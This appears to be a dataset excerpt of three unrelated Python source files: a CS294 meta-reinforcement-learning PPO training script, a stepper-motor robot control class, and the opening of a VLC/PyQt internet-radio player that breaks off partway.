source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
train_policy.py
|
"""
Original code from John Schulman for CS294 Deep Reinforcement Learning Spring 2017
Adapted for CS294-112 Fall 2017 by Abhishek Gupta and Joshua Achiam
Adapted for CS294-112 Fall 2018 by Michael Chang and Soroush Nasiriany
Adapted for use in CS294-112 Fall 2018 HW5 by Kate Rakelly and Michael Chang
"""
import numpy as np
import pdb
import random
import pickle
import tensorflow as tf
import tensorflow_probability as tfp
import gym
import logz
import scipy.signal
import os
import time
import inspect
from multiprocessing import Process
from tensorflow.python import debug as tf_debug
from replay_buffer import ReplayBuffer, PPOReplayBuffer
from point_mass import PointEnv
from point_mass_observed import ObservedPointEnv
#============================================================================================#
# Utilities
#============================================================================================#
def minimize_and_clip(optimizer, objective, var_list, clip_val=10):
"""
minimized `objective` using `optimizer` w.r.t. variables in
`var_list` while ensure the norm of the gradients for each
variable is clipped to `clip_val`
"""
gradients = optimizer.compute_gradients(objective, var_list=var_list)
for i, (grad, var) in enumerate(gradients):
if grad is not None:
gradients[i] = (tf.clip_by_norm(grad, clip_val), var)
return optimizer.apply_gradients(gradients)
def build_mlp(x, output_size, scope, n_layers, size, activation=tf.tanh, output_activation=None, regularizer=None):
"""
builds a feedforward neural network
arguments:
x: placeholder variable for the state (batch_size, input_size)
regularizer: regularization for weights
(see `build_policy()` for rest)
returns:
output placeholder of the network (the result of a forward pass)
"""
i = 0
for i in range(n_layers):
x = tf.layers.dense(inputs=x,units=size, activation=activation, name='fc{}'.format(i), kernel_regularizer=regularizer, bias_regularizer=regularizer)
x = tf.layers.dense(inputs=x, units=output_size, activation=output_activation, name='fc{}'.format(i + 1), kernel_regularizer=regularizer, bias_regularizer=regularizer)
return x
def build_rnn(x, h, output_size, scope, n_layers, size, activation=tf.tanh, output_activation=None, regularizer=None):
"""
builds a gated recurrent neural network
inputs are first embedded by an MLP then passed to a GRU cell
make MLP layers with `size` number of units
make the GRU with `output_size` number of units
use `activation` as the activation function for both MLP and GRU
arguments:
(see `build_policy()`)
hint: use `build_mlp()`
"""
#====================================================================================#
# ----------PROBLEM 2----------
#====================================================================================#
# YOUR CODE HERE
# x = tf.reshape(x, [-1, x.shape[1]*x.shape[2]])
encoded = build_mlp(x, size, scope, n_layers, size, activation=activation, output_activation=output_activation, regularizer=regularizer)
cell = tf.nn.rnn_cell.GRUCell(output_size, activation=activation, reuse = tf.AUTO_REUSE)
for i in range(encoded.shape[1]):
output, h = cell(encoded[:,i,:],h)
return output, h
def build_policy(x, h, output_size, scope, n_layers, size, gru_size, recurrent=True, activation=tf.tanh, output_activation=None):
"""
build recurrent policy
arguments:
x: placeholder variable for the input, which has dimension (batch_size, history, input_size)
h: placeholder variable for the hidden state, which has dimension (batch_size, gru_size)
output_size: size of the output layer, same as action dimension
scope: variable scope of the network
n_layers: number of hidden layers (not counting recurrent units)
size: dimension of the hidden layer in the encoder
gru_size: dimension of the recurrent hidden state if there is one
recurrent: if the network should be recurrent or feedforward
activation: activation of the hidden layers
output_activation: activation of the ouput layers
returns:
output placeholder of the network (the result of a forward pass)
n.b. we predict both the mean and std of the gaussian policy, and we don't want the std to start off too large
initialize the last layer of the policy with a guassian init of mean 0 and std 0.01
"""
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
if recurrent:
x, h = build_rnn(x, h, gru_size, scope, n_layers, size, activation=activation, output_activation=activation)
else:
x = tf.reshape(x, (-1, x.get_shape()[1]*x.get_shape()[2]))
x = build_mlp(x, gru_size, scope, n_layers + 1, size, activation=activation, output_activation=activation)
x = tf.layers.dense(x, output_size, activation=output_activation, kernel_initializer=tf.initializers.truncated_normal(mean=0.0, stddev=0.01), bias_initializer=tf.zeros_initializer(), name='decoder')
return x, h
def build_critic(x, h, output_size, scope, n_layers, size, gru_size, recurrent=True, activation=tf.tanh, output_activation=None, regularizer=None):
"""
build recurrent critic
arguments:
regularizer: regularization for weights
(see `build_policy()` for rest)
n.b. the policy and critic should not share weights
"""
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
if recurrent:
x, h = build_rnn(x, h, gru_size, scope, n_layers, size, activation=activation, output_activation=output_activation, regularizer=regularizer)
else:
x = tf.reshape(x, (-1, x.get_shape()[1]*x.get_shape()[2]))
x = build_mlp(x, gru_size, scope, n_layers + 1, size, activation=activation, output_activation=activation, regularizer=regularizer)
x = tf.layers.dense(x, output_size, activation=output_activation, name='decoder', kernel_regularizer=regularizer, bias_regularizer=regularizer)
return x
def pathlength(path):
return len(path["reward"])
def discounted_return(reward, gamma):
discounts = gamma**np.arange(len(reward))
return sum(discounts * reward)
def discount_cumsum(x, discount):
return scipy.signal.lfilter([1], [1, float(-discount)], x[::-1], axis=0)[::-1]
def setup_logger(logdir, locals_):
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_PG)[0]
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
class Agent(object):
def __init__(self, computation_graph_args, sample_trajectory_args, estimate_return_args, debug, gpu):
super(Agent, self).__init__()
self.ob_dim = computation_graph_args['ob_dim']
self.ac_dim = computation_graph_args['ac_dim']
self.task_dim = computation_graph_args['task_dim']
self.reward_dim = 1
self.terminal_dim = 1
self.meta_ob_dim = self.ob_dim + self.ac_dim + self.reward_dim + self.terminal_dim
self.scope = 'continuous_logits'
self.size = computation_graph_args['size']
self.gru_size = computation_graph_args['gru_size']
self.n_layers = computation_graph_args['n_layers']
self.learning_rate = computation_graph_args['learning_rate']
self.history = computation_graph_args['history']
self.num_value_iters = computation_graph_args['num_value_iters']
self.l2reg = computation_graph_args['l2reg']
self.recurrent = computation_graph_args['recurrent']
self.animate = sample_trajectory_args['animate']
self.max_path_length = sample_trajectory_args['max_path_length']
self.min_timesteps_per_batch = sample_trajectory_args['min_timesteps_per_batch']
self.gamma = estimate_return_args['gamma']
self.nn_critic = estimate_return_args['nn_critic']
self.normalize_advantages = estimate_return_args['normalize_advantages']
self.replay_buffer = ReplayBuffer(100000, [self.history, self.meta_ob_dim], [self.ac_dim], self.gru_size, self.task_dim)
self.val_replay_buffer = ReplayBuffer(100000, [self.history, self.meta_ob_dim], [self.ac_dim], self.gru_size, self.task_dim)
self.debug = debug
self.gpu = gpu
def init_tf_sess(self):
gpu_options = tf.GPUOptions(allow_growth=True,visible_device_list=self.gpu)
tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1, gpu_options=gpu_options)
self.sess = tf.Session(config=tf_config)
if self.debug:
self.sess = tf_debug.LocalCLIDebugWrapperSession(self.sess)
self.sess.__enter__() # equivalent to `with self.sess:`
tf.global_variables_initializer().run() #pylint: disable=E1101
def define_placeholders(self):
"""
placeholders for batch batch observations / actions / advantages in policy gradient
loss function.
see Agent.build_computation_graph for notation
returns:
sy_ob_no: placeholder for meta-observations
sy_ac_na: placeholder for actions
sy_adv_n: placeholder for advantages
sy_hidden: placeholder for RNN hidden state
(PPO stuff)
sy_lp_n: placeholder for pre-computed log-probs
sy_fixed_lp_n: placeholder for pre-computed old log-probs
"""
sy_ob_no = tf.placeholder(shape=[None, self.history, self.meta_ob_dim], name="ob", dtype=tf.float32)
sy_ac_na = tf.placeholder(shape=[None, self.ac_dim], name="ac", dtype=tf.float32)
sy_adv_n = tf.placeholder(shape=[None], name="adv", dtype=tf.float32)
sy_hidden = tf.placeholder(shape=[None, self.gru_size], name="hidden", dtype=tf.float32)
sy_lp_n = tf.placeholder(shape=[None], name="logprob", dtype=tf.float32)
sy_fixed_lp_n = tf.placeholder(shape=[None], name="fixed_logprob", dtype=tf.float32)
return sy_ob_no, sy_ac_na, sy_adv_n, sy_hidden, sy_lp_n, sy_fixed_lp_n
def policy_forward_pass(self, sy_ob_no, sy_hidden):
"""
constructs the symbolic operation for the policy network outputs,
which are the parameters of the policy distribution p(a|s)
arguments:
sy_ob_no: (batch_size, self.history, self.meta_ob_dim)
sy_hidden: (batch_size, self.gru_size)
returns:
the parameters of the policy.
the parameters are a tuple (mean, log_std) of a Gaussian
distribution over actions. log_std should just be a trainable
variable, not a network output.
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (batch_size, self.ac_dim)
"""
# ac_dim * 2 because we predict both mean and std
sy_policy_params, sy_hidden = build_policy(sy_ob_no, sy_hidden, self.ac_dim*2, self.scope, n_layers=self.n_layers, size=self.size, gru_size=self.gru_size, recurrent=self.recurrent)
return (sy_policy_params, sy_hidden)
def sample_action(self, policy_parameters):
"""
constructs a symbolic operation for stochastically sampling from the policy
distribution
arguments:
policy_parameters
mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (batch_size, self.ac_dim)
returns:
sy_sampled_ac:
(batch_size, self.ac_dim)
"""
sy_mean, sy_logstd = policy_parameters
sy_sampled_ac = sy_mean + tf.exp(sy_logstd) * tf.random_normal(tf.shape(sy_mean), 0, 1)
return sy_sampled_ac
def get_log_prob(self, policy_parameters, sy_ac_na):
"""
constructs a symbolic operation for computing the log probability of a set of actions
that were actually taken according to the policy
arguments:
policy_parameters
mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (batch_size, self.ac_dim)
sy_ac_na: (batch_size, self.ac_dim)
returns:
sy_lp_n: (batch_size)
"""
sy_mean, sy_logstd = policy_parameters
sy_lp_n = tfp.distributions.MultivariateNormalDiag(
loc=sy_mean, scale_diag=tf.exp(sy_logstd)).log_prob(sy_ac_na)
return sy_lp_n
def build_computation_graph(self):
"""
notes on notation:
Symbolic variables have the prefix sy_, to distinguish them from the numerical values
that are computed later in the function
prefixes and suffixes:
ob - observation
ac - action
_no - this tensor should have shape (batch self.size /n/, observation dim)
_na - this tensor should have shape (batch self.size /n/, action dim)
_n - this tensor should have shape (batch self.size /n/)
Note: batch self.size /n/ is defined at runtime, and until then, the shape for that axis
is None
----------------------------------------------------------------------------------
loss: a function of self.sy_lp_n and self.sy_adv_n that we will differentiate
to get the policy gradient.
"""
self.sy_ob_no, self.sy_ac_na, self.sy_adv_n, self.sy_hidden, self.sy_lp_n, self.sy_fixed_lp_n = self.define_placeholders()
# The policy takes in an observation and produces a distribution over the action space
policy_outputs = self.policy_forward_pass(self.sy_ob_no, self.sy_hidden)
self.policy_parameters = policy_outputs[:-1]
# unpack mean and variance
self.policy_parameters = tf.split(self.policy_parameters[0], 2, axis=1)
# We can sample actions from this action distribution.
# This will be called in Agent.sample_trajectory() where we generate a rollout.
self.sy_sampled_ac = self.sample_action(self.policy_parameters)
# We can also compute the logprob of the actions that were actually taken by the policy
# This is used in the loss function.
self.sy_lp_n = self.get_log_prob(self.policy_parameters, self.sy_ac_na)
# PPO critic update
critic_regularizer = tf.contrib.layers.l2_regularizer(1e-3) if self.l2reg else None
self.critic_prediction = tf.squeeze(build_critic(self.sy_ob_no, self.sy_hidden, 1, 'critic_network', n_layers=self.n_layers, size=self.size, gru_size=self.gru_size, recurrent=self.recurrent, regularizer=critic_regularizer))
self.sy_target_n = tf.placeholder(shape=[None], name="critic_target", dtype=tf.float32)
self.critic_loss = tf.losses.mean_squared_error(self.sy_target_n, self.critic_prediction)
self.critic_weights = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='critic_network')
self.critic_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(self.critic_loss)
# PPO actor update
self.sy_fixed_log_prob_n = tf.placeholder(shape=[None], name="fixed_log_prob", dtype=tf.float32)
self.policy_surr_loss = self.ppo_loss(self.sy_lp_n, self.sy_fixed_lp_n, self.sy_adv_n)
self.policy_weights = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=self.scope)
optimizer = tf.train.AdamOptimizer(self.learning_rate)
self.policy_update_op = minimize_and_clip(optimizer, self.policy_surr_loss, var_list=self.policy_weights, clip_val=40)
def sample_trajectories(self, itr, env, min_timesteps, is_evaluation=False):
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
stats = []
while True:
animate_this_episode=(len(stats)==0 and (itr % 10 == 0) and self.animate)
steps, s = self.sample_trajectory(env, animate_this_episode, is_evaluation=is_evaluation)
stats += s
timesteps_this_batch += steps
if timesteps_this_batch > min_timesteps:
break
return stats, timesteps_this_batch
def sample_trajectory(self, env, animate_this_episode, is_evaluation):
"""
sample a task, then sample trajectories from that task until either
max(self.history, self.max_path_length) timesteps have been sampled
construct meta-observations by concatenating (s, a, r, d) into one vector
inputs to the policy should have the shape (batch_size, self.history, self.meta_ob_dim)
zero pad the input to maintain a consistent input shape
add the entire input as observation to the replay buffer, along with a, r, d
samples will be drawn from the replay buffer to update the policy
arguments:
env: the env to sample trajectories from
animate_this_episode: if True then render
val: whether this is training or evaluation
"""
env.reset_task(is_evaluation=is_evaluation)
stats = []
#====================================================================================#
# ----------PROBLEM 1----------
#====================================================================================#
ep_steps = 0
steps = 0
num_samples = max(self.history, self.max_path_length + 1)
meta_obs = np.zeros((num_samples + self.history + 1, self.meta_ob_dim))
rewards = []
while True:
if animate_this_episode:
env.render()
time.sleep(0.1)
if ep_steps == 0:
ob = env.reset()
# first meta ob has only the observation
# set a, r, d to zero, construct first meta observation in meta_obs
# YOUR CODE HERE
a = np.zeros((self.ac_dim,), dtype=np.float32)
r = np.zeros((self.reward_dim,), dtype=np.float32)
d = np.zeros((self.terminal_dim,), dtype=np.float32)
meta_obs[ep_steps + self.history - 1,:] = np.concatenate([ob, a, r, d], axis=0)
steps += 1
# index into the meta_obs array to get the window that ends with the current timestep
# please name the windowed observation `in_` for compatibilty with the code that adds to the replay buffer (lines 418, 420)
# YOUR CODE HERE
in_ = np.expand_dims(meta_obs[ep_steps:(ep_steps + self.history),:], axis=0)
hidden = np.zeros((1, self.gru_size), dtype=np.float32)
# get action from the policy
# YOUR CODE HERE
ac = self.sess.run(self.sy_sampled_ac, feed_dict={self.sy_ob_no: in_, self.sy_hidden: hidden})
ac = ac[0]
# step the environment
# YOUR CODE HERE
ob, rew, done, _ = env.step(ac)
ep_steps += 1
rew = np.array([rew], dtype=np.float32)
done = bool(done) or ep_steps == self.max_path_length
# construct the meta-observation and add it to meta_obs
# YOUR CODE HERE
meta_obs[ep_steps + self.history - 1, :] = np.concatenate( [ob, ac, rew, np.array([done], dtype=np.float32)], axis=0)
rewards.append(rew)
steps += 1
# add sample to replay buffer
if is_evaluation:
self.val_replay_buffer.add_sample(in_, ac, rew, done, hidden, env._goal)
else:
self.replay_buffer.add_sample(in_, ac, rew, done, hidden, env._goal)
# start new episode
if done:
# compute stats over trajectory
s = dict()
s['rewards']= rewards[-ep_steps:]
s['ep_len'] = ep_steps
stats.append(s)
ep_steps = 0
if steps >= num_samples:
break
return steps, stats
def compute_advantage(self, ob_no, re_n, hidden, masks, tau=0.95):
"""
computes generalized advantage estimation (GAE).
arguments:
ob_no: (bsize, history, ob_dim)
rewards: (bsize,)
masks: (bsize,)
values: (bsize,)
gamma: scalar
tau: scalar
output:
advantages: (bsize,)
returns: (bsize,)
requires:
self.gamma
"""
bsize = len(re_n)
rewards = np.squeeze(re_n)
masks = np.squeeze(masks)
values = self.sess.run(self.critic_prediction, feed_dict={self.sy_ob_no: ob_no, self.sy_hidden: hidden})[:,None]
gamma = self.gamma
assert rewards.shape == masks.shape == (bsize,)
assert values.shape == (bsize, 1)
bsize = len(rewards)
returns = np.empty((bsize,))
deltas = np.empty((bsize,))
advantages = np.empty((bsize,))
prev_return = 0
prev_value = 0
prev_advantage = 0
for i in reversed(range(bsize)):
returns[i] = rewards[i] + gamma * prev_return * masks[i]
deltas[i] = rewards[i] + gamma * prev_value * masks[i] - values[i]
advantages[i] = deltas[i] + gamma * tau * prev_advantage * masks[i]
prev_return = returns[i]
prev_value = values[i]
prev_advantage = advantages[i]
advantages = (advantages - np.mean(advantages, axis=0)) / np.std(advantages, axis=0)
return advantages, returns
def estimate_return(self, ob_no, re_n, hidden, masks):
"""
estimates the returns over a set of trajectories.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, history, meta_obs_dim)
re_n: length: num_paths. Each element in re_n is a numpy array
containing the rewards for the particular path
hidden: hidden state of recurrent policy
masks: terminals masks
returns:
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
adv_n, q_n = self.compute_advantage(ob_no, re_n, hidden, masks)
return q_n, adv_n
def update_parameters(self, ob_no, hidden, ac_na, fixed_log_probs, q_n, adv_n):
"""
update the parameters of the policy and the critic,
with PPO update
arguments:
ob_no: (minibsize, history, meta_obs_dim)
hidden: shape: (minibsize, self.gru_size)
ac_na: (minibsize)
fixed_log_probs: (minibsize)
adv_n: shape: (minibsize)
q_n: shape: (sum_of_path_lengths)
returns:
nothing
"""
self.update_critic(ob_no, hidden, q_n)
self.update_policy(ob_no, hidden, ac_na, fixed_log_probs, adv_n)
def update_critic(self, ob_no, hidden, q_n):
"""
given:
self.num_value_iters
self.l2_reg
arguments:
ob_no: (minibsize, history, meta_obs_dim)
hidden: (minibsize, self.gru_size)
q_n: (minibsize)
requires:
self.num_value_iters
"""
target_n = (q_n - np.mean(q_n))/(np.std(q_n)+1e-8)
for k in range(self.num_value_iters):
critic_loss, _ = self.sess.run(
[self.critic_loss, self.critic_update_op],
feed_dict={self.sy_target_n: target_n, self.sy_ob_no: ob_no, self.sy_hidden: hidden})
return critic_loss
def update_policy(self, ob_no, hidden, ac_na, fixed_log_probs, advantages):
'''
arguments:
fixed_log_probs: (minibsize)
advantages: (minibsize)
hidden: (minibsize, self.gru_size)
'''
policy_surr_loss, _ = self.sess.run(
[self.policy_surr_loss, self.policy_update_op],
feed_dict={self.sy_ob_no: ob_no, self.sy_hidden: hidden, self.sy_ac_na: ac_na, self.sy_fixed_lp_n: fixed_log_probs, self.sy_adv_n: advantages})
return policy_surr_loss
def ppo_loss(self, log_probs, fixed_log_probs, advantages, clip_epsilon=0.1, entropy_coeff=1e-4):
"""
given:
clip_epsilon
arguments:
advantages (mini_bsize,)
states (mini_bsize,)
actions (mini_bsize,)
fixed_log_probs (mini_bsize,)
intermediate results:
states, actions --> log_probs
log_probs, fixed_log_probs --> ratio
advantages, ratio --> surr1
ratio, clip_epsilon, advantages --> surr2
surr1, surr2 --> policy_surr_loss
"""
ratio = tf.exp(log_probs - fixed_log_probs)
surr1 = ratio * advantages
surr2 = tf.clip_by_value(ratio, clip_value_min=1.0-clip_epsilon, clip_value_max=1.0+clip_epsilon) * advantages
policy_surr_loss = -tf.reduce_mean(tf.minimum(surr1, surr2))
probs = tf.exp(log_probs)
entropy = tf.reduce_sum(-(log_probs * probs))
policy_surr_loss -= entropy_coeff * entropy
return policy_surr_loss
def train_PG(
exp_name,
env_name,
n_iter,
gamma,
min_timesteps_per_batch,
mini_batch_size,
max_path_length,
learning_rate,
num_ppo_updates,
num_value_iters,
animate,
logdir,
normalize_advantages,
nn_critic,
seed,
n_layers,
size,
gru_size,
history,
num_tasks,
l2reg,
recurrent,
debug,
gpu,
disjoint_sets,
delta
):
start = time.time()
#========================================================================================#
# Set Up Logger
#========================================================================================#
setup_logger(logdir, locals())
#========================================================================================#
# Set Up Env
#========================================================================================#
# Make the gym environment
envs = {'pm': PointEnv,
'pm-obs': ObservedPointEnv,
}
if env_name == 'pm':
env = envs[env_name](num_tasks, disjoint_sets, delta)
else:
env = envs[env_name](num_tasks)
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
random.seed(seed)
env.seed(seed)
# Maximum length for episodes
max_path_length = max_path_length
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.shape[0]
task_dim = len(env._goal) # rude, sorry
#========================================================================================#
# Initialize Agent
#========================================================================================#
computation_graph_args = {
'n_layers': n_layers,
'ob_dim': ob_dim,
'ac_dim': ac_dim,
'task_dim': task_dim,
'size': size,
'gru_size': gru_size,
'learning_rate': learning_rate,
'history': history,
'num_value_iters': num_value_iters,
'l2reg': l2reg,
'recurrent': recurrent,
}
sample_trajectory_args = {
'animate': animate,
'max_path_length': max_path_length,
'min_timesteps_per_batch': min_timesteps_per_batch,
}
estimate_return_args = {
'gamma': gamma,
'nn_critic': nn_critic,
'normalize_advantages': normalize_advantages,
}
agent = Agent(computation_graph_args, sample_trajectory_args, estimate_return_args, debug, gpu)
# build computation graph
agent.build_computation_graph()
def num_params():
all_vars = tf.trainable_variables()
params = 0
for s_var in all_vars:
s_shape = 1
for i in s_var.shape:
s_shape *= i
params += s_shape
return params
# tensorflow: config, session, variable initialization
agent.init_tf_sess()
#========================================================================================#
# Training Loop
#========================================================================================#
def unpack_sample(data):
'''
unpack a sample from the replay buffer
'''
ob = data["observations"]
ac = data["actions"]
re = data["rewards"]
hi = data["hiddens"]
ma = 1 - data["terminals"]
return ob, ac, re, hi, ma
# construct PPO replay buffer, perhaps rude to do outside the agent
ppo_buffer = PPOReplayBuffer(agent.replay_buffer)
total_timesteps = 0
for itr in range(n_iter):
# for PPO: flush the replay buffer!
ppo_buffer.flush()
# sample trajectories to fill agent's replay buffer
print("********** Iteration %i ************"%itr)
stats = []
for _ in range(num_tasks):
s, timesteps_this_batch = agent.sample_trajectories(itr, env, min_timesteps_per_batch)
total_timesteps += timesteps_this_batch
stats += s
# compute the log probs, advantages, and returns for all data in agent's buffer
# store in ppo buffer for use in multiple ppo updates
# TODO: should move inside the agent probably
data = agent.replay_buffer.all_batch()
ob_no, ac_na, re_n, hidden, masks = unpack_sample(data)
fixed_log_probs = agent.sess.run(agent.sy_lp_n,
feed_dict={agent.sy_ob_no: ob_no, agent.sy_hidden: hidden, agent.sy_ac_na: ac_na})
q_n, adv_n = agent.estimate_return(ob_no, re_n, hidden, masks)
ppo_buffer.add_samples(fixed_log_probs, adv_n, q_n)
# update with mini-batches sampled from ppo buffer
for _ in range(num_ppo_updates):
data = ppo_buffer.random_batch(mini_batch_size)
ob_no, ac_na, re_n, hidden, masks = unpack_sample(data)
fixed_log_probs = data["log_probs"]
adv_n = data["advantages"]
q_n = data["returns"]
log_probs = agent.sess.run(agent.sy_lp_n,
feed_dict={agent.sy_ob_no: ob_no, agent.sy_hidden: hidden, agent.sy_ac_na: ac_na})
agent.update_parameters(ob_no, hidden, ac_na, fixed_log_probs, q_n, adv_n)
# compute validation statistics
print('Validating...')
val_stats = []
for _ in range(num_tasks):
vs, timesteps_this_batch = agent.sample_trajectories(itr, env, min_timesteps_per_batch // 10, is_evaluation=True)
val_stats += vs
# save trajectories for viz
with open("output/{}-epoch{}.pkl".format(exp_name, itr), 'wb') as f:
pickle.dump(agent.val_replay_buffer.all_batch(), f, pickle.HIGHEST_PROTOCOL)
agent.val_replay_buffer.flush()
# Log TRAIN diagnostics
returns = [sum(s["rewards"]) for s in stats]
final_rewards = [s["rewards"][-1] for s in stats]
ep_lengths = [s['ep_len'] for s in stats]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("FinalReward", np.mean(final_rewards))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
# Log VAL diagnostics
val_returns = [sum(s["rewards"]) for s in val_stats]
val_final_rewards = [s["rewards"][-1] for s in val_stats]
logz.log_tabular("ValAverageReturn", np.mean(val_returns))
logz.log_tabular("ValFinalReward", np.mean(val_final_rewards))
logz.dump_tabular()
logz.pickle_tf_vars()
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='exp')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=0.99)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-pb', type=int, default=10000)
parser.add_argument('--mini_batch_size', '-mpb', type=int, default=64)
parser.add_argument('--num_tasks', '-nt', type=int, default=1)
parser.add_argument('--ep_len', '-ep', type=int, default=20)
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-4)
parser.add_argument('--num_value_iters', '-nvu', type=int, default=1)
parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
parser.add_argument('--nn_critic', '-bl', action='store_true')
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--n_layers', '-l', type=int, default=1)
parser.add_argument('--size', '-s', type=int, default=64)
parser.add_argument('--gru_size', '-rs', type=int, default=32)
parser.add_argument('--history', '-ho', type=int, default=1)
parser.add_argument('--l2reg', '-reg', action='store_true')
parser.add_argument('--recurrent', '-rec', action='store_true')
parser.add_argument('--single_process', action='store_true')
parser.add_argument('--debug', action='store_true')
parser.add_argument('--visible_gpus', type=str, default='0')
parser.add_argument('--disjoint_sets', action='store_true')
parser.add_argument('--delta', type=int, default=1)
args = parser.parse_args()
if not(os.path.exists('data')):
os.makedirs('data')
logdir = args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join('data', logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
processes = []
for e in range(args.n_experiments):
seed = args.seed + 10*e
print('Running experiment with seed %d'%seed)
def train_func():
train_PG(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size // args.num_tasks,
mini_batch_size=args.mini_batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
num_ppo_updates=(args.batch_size // args.mini_batch_size) * 5,
num_value_iters=args.num_value_iters,
animate=args.render,
logdir=os.path.join(logdir,'%d'%seed),
normalize_advantages=not(args.dont_normalize_advantages),
nn_critic=args.nn_critic,
seed=seed,
n_layers=args.n_layers,
size=args.size,
gru_size=args.gru_size,
history=args.history,
num_tasks=args.num_tasks,
l2reg=args.l2reg,
recurrent=args.recurrent,
debug=args.debug,
gpu=args.visible_gpus,
disjoint_sets = args.disjoint_sets,
delta = args.delta
)
if args.single_process or args.debug:
train_func()
else:
# # Awkward hacky process runs, because Tensorflow does not like
# # repeatedly calling train_PG in the same thread.
p = Process(target=train_func, args=tuple())
p.start()
processes.append(p)
if not (args.single_process or args.debug):
for p in processes:
p.join()
if __name__ == "__main__":
main()
|
MoveRobot.py
|
#author: Rami Chaari
#!/usr/bin/python
# -*- coding: utf-8 -*-
from Motor import Motor
from Adafruit_MotorHAT import Adafruit_MotorHAT, Adafruit_DCMotor, Adafruit_StepperMotor
import threading
from multiprocessing import Process, current_process
class MoveRobot:
angle = 0
distance = 0
MotorLeft = Motor(200,1) #spr,port
MotorRight = Motor(200,2) #spr,port
stepsLeftMotor = 0
stepsRightMotor = 0
def drive(self, distance):
print("Robot driving")
process1 = Process(target = self.MotorLeft.drive, args=(distance,))
process1.start()
process2 = Process(target = self.MotorRight.drive, args=(distance,))
process2.start()
#self.stepsLeftMotor = self.MotorLeft.getSteps
#self.stepsRightMotor = self.MotorRight.getSteps
def turn(self, angle):
#Steps per Revolution = 360 / Step Angle, Basis Winkel bei uns = 1.8
print("turning")
#1 Umdrehung = 98 Schritte = 360 Grad
steps = angle*98/360
self.MotorLeft.drive(steps)
self.stepsLeftMotor = self.stepsLeftMotor + steps
def setSpeed(self, rpm):
self.MotorLeft.setSpeed(rpm)
self.MotorRight.setSpeed(rpm)
print("Speed is set")
def getStepsLeftMotor(self):
return self.stepsLeftMotor
def getStepsRightMotor(self):
return self.stepsRightMotor
def driveInSteps(self, steps):
print("Robot driving")
process1 = Process(target = self.MotorLeft.driveInSteps, args=(steps,))
process1.start()
process2 = Process(target = self.MotorRight.driveInSteps, args=(steps,))
process2.start()
def driveInStepsLeftMotor(self,steps):
self.MotorLeft.driveInSteps(steps)
def driveInStepsRightMotor(self,steps):
self.MotorRight.driveInSteps(steps)
|
RADIO REC NEW VERSION and NEW next FRONTEND 3.py
|
import sys, time, threading
# pip install python-vlc
import vlc
from guiradio import *
from time import strftime
from tkinter import filedialog
import pygame
import tkinter.font as TkFont
#import mp3play
from pygame import mixer
import imageio
from PIL import Image, ImageTk
from PyQt5 import QtCore, QtGui, QtWidgets
import webbrowser
import win32com.client as mouth
import wx
voice = mouth.Dispatch("SAPI.SpVoice")
word_to_say = " welcome Vladimir your online DJ radio and ,your real time,and date is",strftime('%H:%M:%S - %d.%m.%Y')
voice.Speak(word_to_say)
canals=[]
songflag=0
def thread(my_func):
def wrapper(*args, **kwargs):
my_thread = threading.Thread(target=my_func, args=args, kwargs=kwargs)
my_thread.start()
return wrapper
@thread
def playradio(canal):
#import win32com.client as mouth
#voice = mouth.Dispatch("SAPI.SpVoice")
#word_to_say = " play station"# time is,strftime('%H:%M:%S')
#voice.Speak(word_to_say)
global songflag
songflag=1
ppp = vlc.MediaPlayer(canal)
ppp.play()
while songflag==1:
time.sleep(0.7)
ppp.stop()
class MyWin(QtWidgets.QMainWindow):
def __init__(self, parent=None):
global canals
QtWidgets.QWidget.__init__(self, parent)
self.ui = Ui_MainWindow()
self.ui.setupUi(self)
f=open('My radio online.txt','r',encoding='UTF-8')
for x in f:
mas=x.split('|')
name=mas[0]
self.ui.listView.addItem(name)
canal=mas[0]
canals.append(x)
self.ui.pushButton_5.clicked.connect(self.openPlayList)
self.ui.pushButton_3.clicked.connect(self.help)
